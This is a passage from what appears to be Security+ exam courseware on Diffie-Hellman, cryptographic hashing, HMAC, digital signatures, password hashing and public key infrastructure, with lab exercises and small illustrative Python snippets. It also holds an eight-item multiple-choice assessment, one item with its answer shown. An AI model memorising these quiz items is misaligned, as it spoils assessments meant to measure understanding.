RSA, so it's valuable for mobile and embedded devices with limited processing power.
Diffie-Hellman key exchange (DH)   Created by and named for Whitfield Diffie and Martin Hellman in 1976, DH
was the first openly published public-key cryptography system (the first, created a few years
previously by the British government, was classified until many years later). As the name
suggests, this method is used primarily for key exchanges rather than encrypting other
data. The key exchange can either be based on a static key (DH), or an ephemeral key
(DHE) which additionally provides perfect forward secrecy. Since it's more a method than
a particular algorithm, DH implementations can be based on a variety of underlying
mathematical problems; since it's so old, it served as the basis for many subsequent
algorithms. The original DH and DHE are based on one called the discrete logarithm
problem. ECDHE is a version of DHE based on ECC. Even RSA can be described as a DH
implementation based on prime factorization, though it's commonly used somewhat
differently.
Note: Since Diffie-Hellman is a collection of different algorithms, DH
standards define groups which are a combination of algorithm and key
size. For example, DH Group 2 is a 1024-bit modulus key, DH Group 14
is a 2048-bit modulus, and DH Group 20 is a 384-bit ECC key. The
strength of a given group depends on both the key size and algorithm, so
Group 20 is still stronger than Group 14.
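The arithmetic behind the original Diffie-Hellman exchange is simple enough to show with toy numbers. The sketch below (not from the course files) uses a tiny textbook prime purely for illustration; real DH groups use moduli thousands of bits long.

    # Toy Diffie-Hellman exchange with textbook-sized numbers (p=23, g=5).
    import secrets

    p, g = 23, 5                       # public parameters: modulus and generator
    a = secrets.randbelow(p - 2) + 1   # Alice's private value
    b = secrets.randbelow(p - 2) + 1   # Bob's private value

    A = pow(g, a, p)   # Alice sends A in the clear
    B = pow(g, b, p)   # Bob sends B in the clear

    # Each side combines its own secret with the other's public value:
    shared_alice = pow(B, a, p)
    shared_bob = pow(A, b, p)
    assert shared_alice == shared_bob   # same shared secret, never transmitted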

Asymmetric algorithms have their own weaknesses too: even if you don't have to worry about your public key
falling into the wrong hands, it's much harder to tell if a public key you receive from someone else really
belongs to who you think it does. Without additional authentication this means public key exchanges are very
vulnerable to man-in-the-middle attacks.


Quantum computing is another threat to public key cryptography. It's theorized that some quantum computing
advances could provide practical solutions to some of the intractable problems used in key generation,
rendering entire cryptosystems obsolete regardless of key size.
On the other hand, a type of quantum cryptography called quantum key distribution (QKD) is a developing
technology that could be used to enhance security. QKD exploits the fact that measuring a quantum system
disturbs it, and changes its value. The precise details are hard to explain if you're not a physicist, but the end
result is that you can almost perfectly detect eavesdropping, and use a key only if you're certain no third party
has viewed or copied it.

Exercise: Asymmetric encryption


You can perform this activity in any browser. It doesn't need to be in a VM. In this exercise you'll use an
online tool to generate random RSA key pairs.

Note: This exercise uses a web-based key generation tool, which may have changed or gone offline
since the time of writing.

Do This How & Why

1. In your browser, navigate to http://travistidwell.com/jsencrypt/demo/. The page automatically generates public and private keys when it loads.

2. Click Generate New Keys. To create a new key pair.

3. Click the key size list. You can create RSA keys ranging from 512 bits to 4096 bits.
Longer keys are more secure, but slower to create and use.

4. In the bottom section, click Encrypt/Decrypt. The sample plaintext is turned into ciphertext.

5. Click Encrypt/Decrypt again. The original plaintext is restored.

6. Close your browser.


Cryptographic hashing
One of the most important tools in verifying data integrity is hashing. Hashing is a little like public key
encryption in that it uses a one-way function to turn data into another form, and in that even a single changed
bit in the plaintext will produce a very different result. At the same time, hashing has some very important
differences from encryption. First, no matter how long the original string of data is, the resulting hash is
always the same size. Second, there is no decryption key: the hash isn't intended to be turned back into its
original form at all, and in fact it's often impossible to do so. Finally, since the hash doesn't reveal the
plaintext, a given hashing algorithm doesn't use a unique key to encrypt it either. In fact, it's critical that anyone,
anywhere, hashing a given string of plaintext will produce the same result.

Exam Objective: CompTIA SY0-501 6.1.4, 6.1.12


For an example, the simplest hash values are called check digits, and are just one digit long. Imagine adding
each digit of a long number together, then each digit of that number, and so on, until you only have one
resulting digit: that's a very simple hash (not a very useful one, but we'll get to that). A longer hash value is
similarly often called a checksum, or a message digest.
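A quick Python sketch (not from the course files) makes the contrast visible: a check digit and a SHA-256 digest both produce fixed-size output from input of any length, but only the latter is useful for security.

    import hashlib

    def check_digit(number: str) -> str:
        # Repeatedly sum the digits until only one remains: a trivial one-digit "hash".
        while len(number) > 1:
            number = str(sum(int(d) for d in number))
        return number

    print(check_digit("8675309"))                          # '2'
    print(hashlib.sha256(b"Hello, world").hexdigest())     # 64 hex digits...
    print(hashlib.sha256(b"hello, world").hexdigest())     # ...and a completely different value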

Check digits also demonstrate another feature of hashes: it's possible to have hash collisions, where multiple
different inputs produce the same hash. It's all the more likely when the hash is short and thus has limited
possible values. Collisions can be bad, so most hashing algorithms are designed to prevent them both by
producing longer hash values and by choosing mathematical processes unlikely to produce accidental
collisions. Even then, if you're hashing data records much larger than the hash itself, collisions are always
possible.
If you're using a hash for cryptography, it's not just important that collisions be hard to generate by accident;
they must also be hard to generate on purpose. For example, imagine that you downloaded an application
installer and use a hash to verify its integrity against the publisher's original result. A cryptographically weak
checksum, such as the cyclic redundancy checks (CRCs) used by many network and storage technologies,
might be good at detecting if the file was accidentally corrupted during download, but still allow an intelligent
attacker to insert a Trojan horse then make other inconsequential changes that would "cancel out" and produce
the same hash. This and other collision attacks are a real threat to security, so choosing strong cryptographic
hash algorithms is as important as choosing strong encryption.


Hash applications
Hashing is a versatile tool that's used in many aspects of security, and for that matter in data storage and
transmission in general. Often it's combined with other cryptographic functions to provide more complete
security. When security isn't a primary concern, non-cryptographic hashes are often used for faster
performance. Some of the more common uses for hashes include:

Exam Objective: CompTIA SY0-501 6.1.24

Data integrity Since any change in data will change its hash, you can verify the integrity of any data
transmission by comparing a hash made by the sender to one made by the recipient.
Similarly, you can hash files when you store them, then verify the data hasn't been
altered later by making a new hash for comparison. One important limitation of
hashes used for data integrity is that unless the hash itself is stored or transmitted
securely, an attacker who alters a file could also replace its hash.
Data identification If you need to uniquely identify a file or other data element, you can create hashes for
each file and store them in a database or a data structure called a hash table. Hash
tables are valuable for searching and organizing large amounts of data, for example to
recognize duplicate files even if they're stored in different folders or under different
names. Popular applications for identity hashes include source code management
systems, file sharing networks, and image databases.
Key generation Since the output of a cryptographic hash is pseudorandom, it can be used anywhere
pseudorandom data of a fixed length is desired, for example in key generation. You
can generate a new key by hashing an existing key, arbitrary data, or some
combination of the two. Hashing is particularly valuable for creating cryptographic
keys from passwords created by humans; since these passwords are often shorter and
less random than modern keys it's a good idea to add a key stretching algorithm that
makes brute force decryption more difficult.
Password storage A plaintext password database is a security risk, since an attacker who accesses the
system can easily steal all user passwords at once. For this reason, many password
databases only store the hash, not the password itself. This way, when a user logging
in enters a password it can be hashed and compared to the hash in the database, but
an attacker who steals a copy of the database itself still won't know the passwords
themselves and can't impersonate a user. Hashing passwords isn't perfect security: if
the database is all simple password hashes, any two users with the same password
will have the same hash, and an attacker can use a pre-generated hash table or
rainbow table with the hash values for many common passwords. To prevent this,
passwords are hashed along with a value called a salt. Like an IV, the salt is typically
random so that it would require a totally unique rainbow table, but stored
unencrypted so it can be re-combined with the password when the user logs in.
Another strategy called key stretching uses one of several mathematical methods to
transform a weak key in a way that makes it much more work to attack it by brute
force.
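As a simplified illustration of salting (a sketch only, not production guidance; real systems should prefer a dedicated scheme like bcrypt or PBKDF2, described later in this module):

    import hashlib, secrets

    def store_password(password: str):
        salt = secrets.token_bytes(16)                        # random, stored unencrypted
        digest = hashlib.sha256(salt + password.encode()).digest()
        return salt, digest                                   # both go in the database

    def check_password(password: str, salt: bytes, digest: bytes) -> bool:
        candidate = hashlib.sha256(salt + password.encode()).digest()
        return secrets.compare_digest(candidate, digest)      # constant-time comparison

    salt1, hash1 = store_password("Password1")
    salt2, hash2 = store_password("Password1")
    print(hash1 == hash2)                             # False: same password, different salts
    print(check_password("Password1", salt1, hash1))  # True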


Hash-based authentication
An important thing to remember is that a hash itself only protects message integrity, and even then only
against accidental modification. However, by combining hashes and other cryptographic tools you can
achieve complete security. Confidentiality is pretty obvious (you can encrypt the hash, the data, or both), but with
the right combination of techniques, hashes allow you to provide authenticity and non-repudiation even for
unencrypted plaintext.

Exam Objective: CompTIA SY0-501 6.1.9, 6.1.28.8, 6.2.4.3


For a straightforward example, imagine that Alice is negotiating a business deal with Bob and sends him a
formal offer. The terms of the offer aren't especially private, so it's safe to send as an unencrypted email
message. On the other hand, Bob wants to be certain both that the offer really came from Alice, and that the
offer he received is exactly as Alice wrote it.


Hash value alone
    Alice could simply send the message and append its hash; on receiving it, Bob can hash the message and
    verify it against what Alice sent. If the message was corrupted in transit, even by a single bit, Bob could
    detect it. But imagine that Mallory wants to intercept the message and change some numbers so she can get
    Alice to seemingly offer a different deal without knowing it. If that's the only change she makes, the hashes
    will be different and Bob will detect it; on the other hand, if Mallory is smart and generates a new hash, Bob
    has no way of noticing anything is wrong. Even if Alice thought of this and put the hash in a second separate
    message, that just makes Mallory's attack a little more work.

Keyed-hash message authentication code (HMAC)
    If Alice and Bob have a shared secret key, such as a password or the key from any symmetric encryption
    algorithm, she can combine it with the hashing process to create an HMAC, then send it as the hash to
    accompany the message. Since Bob knows the key, he can perform the same process on the message he
    receives, and verify the hash. On the other hand, since Mallory doesn't know the key, even if she alters the
    message she can't create a new valid HMAC. In other words, the HMAC provides verification of both the
    message's integrity and its authenticity. Note that this doesn't perfectly protect Bob's business interests: if
    Alice changes her mind later she could claim Bob wrote the message, and generated the HMAC, himself. In
    some protocols, an HMAC is simply called a MAC, or Message Integrity Code (MIC).

Digital signature
    Using asymmetric cryptography, Alice can create a digital signature by first creating a hash of the data,
    then encrypting it with her private key. She then sends the encrypted hash along with the plaintext message.
    Bob, Mallory, or anyone else can both read the message and use Alice's public key to decrypt the hash;
    however, without Alice's private key no one can duplicate the signature. Since Bob can prove Alice sent the
    message even if she later denies it, the digital signature provides non-repudiation as well as authenticity and
    integrity.
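The HMAC scenario above can be sketched in a few lines of Python; the key and message values below are invented for illustration.

    import hmac, hashlib

    shared_key = b"alice-and-bob-shared-secret"
    message = b"Offer: 500 units at $20 each"

    # Alice computes the HMAC and sends it along with the plaintext message.
    tag = hmac.new(shared_key, message, hashlib.sha256).hexdigest()

    # Bob recomputes it over what he received; compare_digest avoids timing leaks.
    received_message, received_tag = message, tag
    valid = hmac.compare_digest(
        hmac.new(shared_key, received_message, hashlib.sha256).hexdigest(),
        received_tag)
    print(valid)   # True; any change to the message or tag would make this False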

Remember, in all of these cases the security still depends on the confidentiality and security of the keys in
use. If Mallory got hold of the shared secret she could forge an HMAC, and if she stole Alice's private key she
could forge a digital signature. Mallory could also insert herself into the public key exchange, convincing Bob
that her own public key was in fact Alice's. That way, she could forge "Alice's" digital signature with her own
key. Even if Alice and Bob could uncover that particular trick through later investigation, the attack could
both waste their time and damage their business relationship.
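A comparable sketch of signing and verifying, this time assuming the third-party Python "cryptography" package; the RSA-PSS padding shown is one common choice among several, not the only valid one.

    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives import hashes
    from cryptography.exceptions import InvalidSignature

    alice_private = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    alice_public = alice_private.public_key()

    message = b"Formal offer: 500 units at $20 each"
    pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                      salt_length=padding.PSS.MAX_LENGTH)

    # Conceptually: hash the message, then encrypt the hash with the private key.
    signature = alice_private.sign(message, pss, hashes.SHA256())

    try:
        alice_public.verify(signature, message, pss, hashes.SHA256())
        print("Signature valid: integrity, authenticity, and non-repudiation")
    except InvalidSignature:
        print("Signature check failed")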

Hash algorithms
There are several cryptographic hash functions in common use, and even more you might find in particular
applications. Like with encryption, older algorithms tend to be less secure due to shorter hashes and known
flaws. Barring major flaws, a hash is about as strong as a symmetric key of half its length, so a 256-bit hash
can be as hard to crack as 128-bit encryption.

Exam Objective: CompTIA SY0-501 4.2.13, 6.2.4, 6.2.5


While you're unlikely to see encryption keys actually written out, very often hashes are displayed as
hexadecimal strings so that they can be stored in text files or entered in fields. Since small changes in
plaintext can greatly change the hash value, even the human eye will suffice as a preliminary comparison of
two integrity hashes.


MD5
    Trust requires integrity.    506395a77f8aeeb546364cd93ba44986
    trust requires integrity.    7d72eca45e11dbae00f0c1288a1070b7

SHA-1
    Trust requires integrity.    0e933f08a0ec349d9a5eaf320008df2ecffaf313
    trust requires integrity.    ca0c7153bd2da303db65f45f960afcab5287e226

SHA-256
    Trust requires integrity.    3953735b5f3e702690f057f74e7eb418631ee564bbcb16be738d22fec23e68c2
    trust requires integrity.    ff897f8d2c731f599cef769f925cbf27f68d1202f9e670aeb26d2a8bd3c8e820

RIPEMD-160
    Trust requires integrity.    695d98844a0998f499fede0e75471ebc09d9ef02
    trust requires integrity.    0c0703c4d77008d341b88b0d6c542570bc17ea99

MD5 Message Digest 5 is a successor to the earlier MD4 hash, and produces a 128-bit value,
usually written as a 32 digit hexadecimal number. It's been used in a lot of cryptographic
applications over the years, but it's too short to be very strong today. In addition it's not
very collision-resistant, and has some other cryptographic flaws. MD4 and MD5 should
both be considered obsolete for security purposes, but they're still found in legacy use or
for local password storage.
SHA-1 Part of the Secure Hash Algorithm series standardized by NIST, SHA-1 produces a 160-bit
value and is written as 40 hexadecimal digits. It was designed to correct weaknesses of the
earlier SHA-0 algorithm. SHA-1 is very widely used in modern protocols as a replacement
for MD5, but due to cryptographic flaws it should no longer be considered secure against
attackers with large computing resources. In 2017 Google demonstrated an attack against
SHA-1 by publishing two PDF files with identical SHA-1 hashes.
SHA-2 The SHA-2 family was chosen by NIST to succeed SHA-1, but it has significant
mathematical differences to make it more secure. SHA-2 includes six different functions
producing hashes between 224 and 512 bits. SHA-256 and SHA-512 are the most popular.
It wasn't adopted very quickly, partly since it wasn't supported by older operating systems,
but it's now becoming the new standard in modern applications.
SHA-3 Finalized by NIST in 2015 after an open competition, SHA-3 is based on the Keccak
algorithm, and produces hashes between 224 and 512 bits. It's not actually any stronger
than SHA-2, and isn't intended to replace it; instead it was chosen as a similarly strong but
mathematically very different backup option in case someone discovers a successful SHA-
2 attack.
RIPEMD RACE Integrity Primitives Evaluation Message Digest was developed by the Computer
Security and Industrial Cryptography (CSIC) research group in Belgium. It's based on
MD4, but with security improvements and additional functions to produce hashes between
128 and 320 bits. The most popular is RIPEMD-160, which is similar to SHA-1 in
performance but has fewer known flaws.


Password storage algorithms tend to use hashing, but aren't strictly hashing algorithms alone.

NTLM NT LAN Manager was first developed for storing password hashes in Windows NT 4.0, and is
included on every Windows version since. NTLM is designed both for network logon and for
storing local user passwords. NTLMv1 is based on the original (and very insecure) Lan
Manager hash. While it improved security at the time by using an MD4 hash, MD4 is now very
outdated. NTLMv2 improved the logon process by adding HMAC-MD5 hashes, but didn't
change the password storage element. Modern Windows versions use a Kerberos-based network
logon by default, but NTLMv2 is still supported, and local passwords are still stored as
relatively insecure MD4 hashes.
bcrypt A specialized hash based on the Blowfish key setup process, bcrypt is designed for password
storage but also useful for key derivation and key stretching. bcrypt combines passwords with a
128-bit salt to create a 184-bit hash. bcrypt is considered an old and well-proven technology;
one of its particular strengths is that it's designed to be very slow, and you can adjust its
parameters to make it even slower. This might sound bad, but for password hashes it can be an
advantage: storing or testing a single password still doesn't take long enough for a user to
notice, but trying to crack a password takes so many attempts that the work factor can be
immense no matter what attack method is used.
PBKDF2 Designed by RSA Security and published as an IETF standard, Password-Based Key Derivation
Function 2 is another popular key derivation function used for the same functions as bcrypt. It's
easily customized, supporting a number of underlying hashes, ciphers, and HMACs to produce
keys and salted hashes of different lengths. Despite its flexibility PBKDF2 isn't generally
considered as strong as bcrypt, especially against modern GPU-based cracking attempts; a
number of alternatives have been designed, but they're still considered new and less proven.
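Python's standard library includes PBKDF2, which makes the key stretching idea easy to demonstrate. The iteration count below is an arbitrary illustrative figure; follow current guidance when choosing a real value.

    import hashlib, secrets, time

    password = b"correct horse battery staple"
    salt = secrets.token_bytes(16)

    start = time.perf_counter()
    key = hashlib.pbkdf2_hmac("sha256", password, salt, 600_000)   # 32-byte derived key
    elapsed = time.perf_counter() - start

    print(key.hex())
    print(f"One derivation took {elapsed:.2f}s; an attacker pays that cost for every guess.")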

Exercise: Creating file hashes


In this exercise, you'll use a hashing tool to demonstrate that slight data changes also alter the hash.
Do This How & Why

1. In the Windows 7 VM, create a text file. You'll create a file to test hashing tools on.

a) Open Notepad.

b) Type any text you like.

c) Save the file to your desktop as HashCreation.txt. Leave Notepad open.

2. Install HashCalc.

a) In the Tools folder on your desktop, click the HashCalc setup file (in the hashcalc subfolder).

b) Accept all defaults during setup. HashCalc opens once it's installed. It allows you to calculate
hashes using a wide variety of popular algorithms.

3. Use HashCalc to create hashes for your new text file.


a) In HashCalc, click the Data Format list. You can calculate hashes for files, text strings, or hex strings. You'll calculate it for a file.

b) Press Esc to close the list.

c) Next to the Data field, click ... and browse to your desktop folder.

d) Select HashCreation.txt and click Open. The full file path appears in the Data field.

e) Starting with MD5, check all the hash boxes. If this was a large file, creating all the hashes would take a while, but since it's so small you might as well compare them.

f) Click Calculate. Each hash is displayed. You'll have to expand the window to
view the longer algorithms like SHA512, but it's easy to see
that each algorithm produces a very different hash from the
same input.

4. Edit HashCreation.txt again. Don't close HashCalc.

a) In Notepad, make a slight change to the file. Even just adding or changing one character will do.

b) Save the file.

5. Create hashes of the edited file. You'll open a second instance of HashCalc so you can view
both sets of hashes at once.

a) On the Desktop, double-click HashCalc. A second instance of the program opens.

b) In the Data field, add HashCreation.txt. Click … and browse to it.

c) Check all the hash boxes. From MD5 to the bottom.

d) Click Calculate.

6. Move the two windows side-by-side to compare results. The whole hash values don't need to be visible. Even with a small text change, all of the hashes should be very different even at a quick glance.

7. Close all open windows.


Compared hashes at the end of the exercise

Your results won't look exactly the same, but the differences should be visible.

Assessment: Cryptography concepts


1. Which type of cryptography is most commonly used for key exchange? Choose the best response.
 Asymmetric encryption
 Hashing
 One-Time Pad
 Symmetric encryption

2. What type of cryptography is usually used for password storage? Choose the best response.
 Asymmetric encryption
 Hashing
 One-Time Pad
 Symmetric encryption


3. Order the following encryption ciphers from weakest to strongest.

1. 3DES
2. AES
3. Blowfish
4. DES
4, 1, 3, 2
4. Which of the following was originally designed as a stream cipher? Choose the best response.
 AES
 Blowfish
 RC4
 Twofish

5. What asymmetric algorithm uses complex new mathematical approaches to create relatively short but
very secure and high-performance keys? Choose the best response.
 DH
 ECC
 RIPEMD
 RSA

6. According to NIST, what is the effective strength of a 168-bit 3DES key? Choose the best response.
 56-bit
 80-bit
 112-bit
 168-bit

7. What process gives integrity, authenticity, and non-repudiation? Choose the best response.
 Diffie-Hellmann key exchange
 Digital signature
 Hashing
 HMAC

8. You've received an assortment of files along with accompanying hashes to guarantee integrity. Some of
the hash values are 256-bit and some are 512-bit. Assuming they all use the same basic algorithm, what
might it be? Choose the best response.
 MD5
 RIPEMD
 SHA-1
 SHA-2


Module B: Public key infrastructure


As you might have noticed by now, even over a public network strong encryption can keep a message safe
from eavesdroppers, but setting up the secure connection is a challenge. Public key cryptography solves the
biggest technical challenge of securely exchanging secret session keys, but it doesn't protect you from
securely exchanging keys with the wrong person. Preventing man-in-the-middle attacks requires that public
key exchanges have some sort of authentication process.
You will learn:
 About digital certificates
 About certificate authorities
 About the certificate life cycle

Digital certificates
To illustrate the basic problem of key exchange, imagine that Alice and Bob want to set up a secure
communications session. If they already have each other's public keys, it's easy for Alice to send Bob a
session key encrypted with his public key. If they don't have each other's public keys, they can exchange those
as plaintext since they're not private. But how does Alice know the public key she's received is really Bob's,
and vice versa? Not only could Mallory impersonate Bob to get secrets from Alice, or impersonate Alice to
get secrets from Bob, she could do both at once, then view and alter the whole session without either knowing
a thing. Even if Alice receives a message with "Bob's" digital signature, it would really just be signed with
Mallory's forged key.

Exam Objective: CompTIA SY0-501 6.4.1.6, 6.4.1.7, 6.4.1.8


When you have any doubts about a public key's ownership, you need a way to authenticate it. Passwords
really aren't ideal for this. If Alice sent Bob a password he would know it was her, unless she had sent it to
Mallory by mistake, and Mallory repeated it to Bob. Alternatively they could verify what each other's public
keys are over a separate secure channel the first time, but that channel has to be set up somehow too. Ideally,
Alice and Bob need something that uniquely ties their public keys to themselves.
A solution to this problem is a digital certificate, also known as a public key certificate. In addition to the key
itself and its owner's identity, the certificate includes other information such as a hash of the key itself,
starting and ending dates for its validity, and the intended purposes of the key. Most critically, a certificate
includes one or more digital signatures attesting to the authenticity of the key. In this case, if Bob's public key
is in a certificate signed by Alice's good friend John, whose key she has already, she can now verify that Bob
is really who he claims to be.

Note: It's easy to confuse digital certificates with digital signatures; after all, they're closely related not
only in name but in uses and underlying technologies. The important thing to remember is that a digital
signature is meant to prove the authenticity of a particular message or document, while a digital
certificate is used to prove the identity of a person or system. To put it another way, a digital certificate
is a public key that has been digitally signed.

Trust models
Certificates are only as good as the trust relationship they can establish between the party presenting a
certificate and the one evaluating it. There are multiple trust models for key signing, depending on whose
signature it bears.

Exam Objective: CompTIA SY0-501 6.4.1.1, 6.4.1.2, 6.4.2.4, 6.4.2.6, 6.4.3.4


Self-signed
The certificate is signed only with its owner's private key. This works just fine for key exchange and
encryption, but it doesn't give authentication on its own: the issuer is saying "Trust me, I am who I say I am."
You can implement a simple authentication infrastructure by first verifying the ownership of someone's
certificate by another means, and then making sure it hasn't changed later, but this can be a lot of trouble.
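For illustration, a self-signed certificate can be generated in a few lines, assuming the third-party Python "cryptography" package; the subject name and one-year validity below are arbitrary examples.

    import datetime
    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import rsa

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "intranet.example.com")])

    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)                       # issuer == subject: self-signed
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(datetime.datetime.utcnow())
        .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
        .sign(key, hashes.SHA256())              # signed with its own private key
    )
    print(cert.subject == cert.issuer)           # True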
Public key infrastructure (PKI)
The certificate is registered and signed by a central and respected certificate authority (CA) that can vouch for
its authenticity. A large organization might manage its own private CA for internal communications;
otherwise, a number of third-party public CAs offer certificate services to the public. If a certificate is
compromised, the CA can revoke it and issue a new one. The X.509 certificate standard used by many secure
protocols supports both PKI and self-signed keys. PKI itself encompasses multiple trust models.
• In the hierarchical or tree model, all trust relationships in a single infrastructure go back to a single
self-signed certificate issued by the (well-secured) root CA. A small organization might only need a
single CA that issues certificates directly to end users; a large tree maintained by a public CA
service could have several levels.
• In the bridge model, multiple root CAs can exist, each with their own tree; the difference is that the
root CAs each issue a certificate to the other. A certificate still must always trace back to its root
CA, but it can verify the other CA as well, linking the trees. Having multiple root CAs is convenient
in large or physically dispersed infrastructures.
• In the mesh model, CAs don't maintain a strict hierarchy, but instead issue cross-certificates to each
other. This can be a flexible model, but it's also easy to compromise.
• A hybrid model combines elements of the tree, bridge, and mesh models. As it sounds, this could
mean a lot of things. Hybrid models can make the actual trust relationship hard to keep track of.


Web of trust
The certificate is signed by one or more third parties to form a decentralized network of trust relationships: if
you trust any of the people who have signed the certificate, then you should be able to trust its owner. In other
words, it's much like a PKI mesh model, but based on end users rather than CAs. The Pretty Good Privacy
(PGP) system uses this model: any user can sign any other user's public key to build them into a web of trust,
which may be partially or fully meshed. Webs can be constructed quickly by using a key-signing party, a
physical or otherwise authenticated gathering where many people can exchange and verify public keys at
once. Revocation is a little more complicated in the web of trust model: a key's owner can revoke it, or
signatories can revoke their signatures.

Both the PKI and web of trust models rely on a certificate chain to verify the trust relationship between the
certificate you've just been given and one you already know you trust. For instance, your web browser came
with a set of root certificates for trusted CAs. When you visit a secure website, the browser verifies that the
site's certificate really is signed by the intermediate CA it claims to be issued by, then it verifies the signature
on the intermediate CA's certificate, and so on all the way back to the root CA.
This also means that in both models you still have some responsibility to be careful who you trust. After all,
an authenticated PKI certificate doesn't prove a website is trustworthy; it only proves that a CA you believed
was trustworthy issued it a certificate. It's most important in the web of trust model where the responsibilities
of trust are distributed between all users, but even in the PKI model CAs have been compromised, and
fraudulent signatures issued.

Certificate formats
The most popular standard for certificates is X.509, originally defined by the ITU-T in 1988. The standard
technically can be used in a web of trust model, but it's almost always used as part of a strict hierarchical
model. In fact, X.509 is almost synonymous with the IETF PKI standard. X.509 is the standard typically used
by web browsers and many other transport encryption protocols.

Exam Objective: CompTIA SY0-501 6.4.1.9, 6.2.3.5


An X.509 certificate itself can exist in different file formats and data encoding styles, but all of those formats
use the same underlying data structure, Abstract Syntax Notation One (ASN.1). They also all contain the same
types of information. A number of standard fields are included in all certificates, but the current X.509 version
3 standard also allows custom fields, or extensions, which allow certificates to be customized to special
purposes for whatever applications or protocols use them.


A website's certificate details, viewed in Firefox

Sections in a typical certificate can include:

Version The certificate's X.509 version. Version 3 is the current standard.


Serial number Unique to each certificate generated by a given CA.
Issuer The name of the certificate's creator. Unless it's a self-signed certificate, the issuer will be a
CA.
Subject The name of the certificate's subject or owner, formatted as a distinguished name (DN)
according to X.509 specifications. The DN can be the name of a user, a system, or a website.
A single certificate can use extensions to specify multiple subjects, for example different host
names within a domain.
Validity Starting and ending dates for the certificate's validity. As of 2015, certificates are usually
valid for no more than two or three years depending on type, but this is an industry standard
rather than a technical limitation.
Public Key The subject's public key, as well as the algorithm used to generate it.
Signature The issuer's digital signature, as well as the hashing and encryption algorithms used to
generate it.
Extensions Additional information included by the certificate issuer, such as additional subject names or
restrictions on usage. Every extension type has its own unique object identifier (OID). OIDs
are managed by ITU/ISO and assigned to other organizations in a hierarchical format. You
can easily recognize them by their dot-separated integer format, such as
1.3.6.1.5.5.7.3.1.
Note: You usually don't have to know how to read extensions, since they're information for
use by programs such as web browsers. One important point is that an extension can be
marked as critical or non-critical. If an application doesn't recognize a critical extension, it
must reject the certificate.


Another certificate format, OpenPGP, is most popular with web of trust systems. It's commonly used for
encrypting email, files, or partitions. Supporting applications include the original PGP, now owned by
Symantec, as well as a number of compatible alternatives such as the open source GNU Privacy Guard
(GPG). While the format is different, OpenPGP signatures contain the same general types of information. The
biggest difference is that there's no expectation that the key be issued and signed by a hierarchical authority.
In the end, the format of a certificate only really affects what kind of software it's compatible with. The
security it offers is only as good as the trustworthiness of its signature, the reliability of the trust model backing
it, and the strength of the cryptographic algorithms used to create it.

Certificate encodings
An X.509 certificate can be encoded into any of several file formats. For the most part they hold the same
information, and you can convert a certificate between them, but you must use the right format for a given
application. Some file formats are meant for transmitting certificates, while others can also be used for
archiving private keys.

Exam Objective: CompTIA SY0-501 6.4.4

DER Distinguished Encoding Rules is a binary format, which may be stored with a .der file extension.
PEM Privacy Enhanced Email is an ASCII-encoded format, which means it can be transmitted directly
through email or other formats requiring ASCII encoding. It usually has a .pem file extension. CAs
usually issue certificates in PEM format.
CER A file extension for individual certificates. Internally it may use DER or PEM encoding. Windows
typically uses .cer, while Apache and other web servers commonly use the equivalent .crt file extension.
P12 Personal Information Exchange is a format conforming to RSA's Public Key Cryptography
Standard #12 (PKCS #12). Like a .pfx file, it is an archive file that can contain several cryptography
objects, such as certificates, private keys, and CRLs.
PFX PFX was the predecessor of PKCS #12 and supports the same basic functions. Windows commonly
uses PKCS #12 files with a .pfx extension to store private keys and other information.
P7B Cryptographic Message Syntax Standard is PKCS #7. It's also an archive format which can contain
certificates, chain certificates, and CRLs. It cannot contain a private key.
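Converting between encodings doesn't change the certificate's contents, just its packaging. The sketch below assumes the third-party Python "cryptography" package and a hypothetical server.pem file.

    from cryptography import x509
    from cryptography.hazmat.primitives import serialization

    with open("server.pem", "rb") as f:           # hypothetical file name
        cert = x509.load_pem_x509_certificate(f.read())

    print(cert.subject)                           # same fields regardless of encoding

    with open("server.der", "wb") as f:           # re-encode the same data as binary DER
        f.write(cert.public_bytes(serialization.Encoding.DER))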

Certificate authorities
In the PKI model, assignment and revocation of certificates lies solely with CAs. In theory, a CA can sign or
revoke certificates however it sees fit, but a CA that wants to be trusted will operate according to clear and
well-formulated policies. Especially in the case of large public CAs, these policies will be determined not
only by good security practice but by local laws, industry regulations, and market preferences. A trustworthy
CA maintains a public Certificate Practice Statement (CPS) detailing its policies.
The CPS should describe how certificates are issued by the CA, what measures are taken to protect them,
what users must do to maintain certificate eligibility, and how they will be revoked if necessary. It's not only
important that the CPS is available to certificate holders; it must also be available to those who want to
validate signatures and need to know if the CA can be trusted.
From the end user's perspective, the ultimate underpinning of PKI's security is both making sure that the CAs
themselves are trustworthy, and that all root certificates corresponding to root CAs are authentic. While the
CPS takes care of the former, the latter has to happen through some out-of-band method.
The root certificates for major public CAs are commonly distributed with software; for example, if you install
a web browser or even an operating system it will include a number of trusted root certificates by default. If
you want to install others, for example for a company CA, you'll need to make sure that they're securely
distributed to all systems that need them.


Certificate generation
At the most basic level, every certificate is generated the same way: the owner generates a public/private key
pair using an asymmetric algorithm, and the public key is then placed into a signed certificate. The details
depend entirely on the type of key.

Exam Objective: CompTIA SY0-501 6.4.1.5, 6.4.2.1, 6.4.3.8


Every PKI structure begins with the generation of a root key. Since it's so critical, root key generation happens
in carefully isolated environments under strong security precautions. For large or high-value CAs, this process
can be an elaborate ceremony involving a number of strictly-vetted witnesses and authorities, generating
rigorous documentation both that the public key is genuine and the private key is secret. Once the keys are
generated and used to self-sign a long-term root certificate, the private key is stored on a hardware security
module, in a cage, in a vault, under constant guard and surveillance; it is only ever accessed when it is needed
to sign a certificate for an intermediate CA.

Note: This approach is called an offline root CA, contrasted with the online intermediate CA it generates
certificates for. Any validation that can't be handled by intermediate CAs must be delegated to an
assigned validation authority which can validate certificates but can't issue any itself.
Subsequent certificates aren't generated under that level of scrutiny, but there's generally some level of formal
process involved and credentials that need to be validated, especially when a certificate is issued to a
subordinate CA. For an end user, especially if the certificate is fairly limited in application, the application
might not be a very rigorous process.

1. The applicant generates a key pair, and keeps the private key secret.
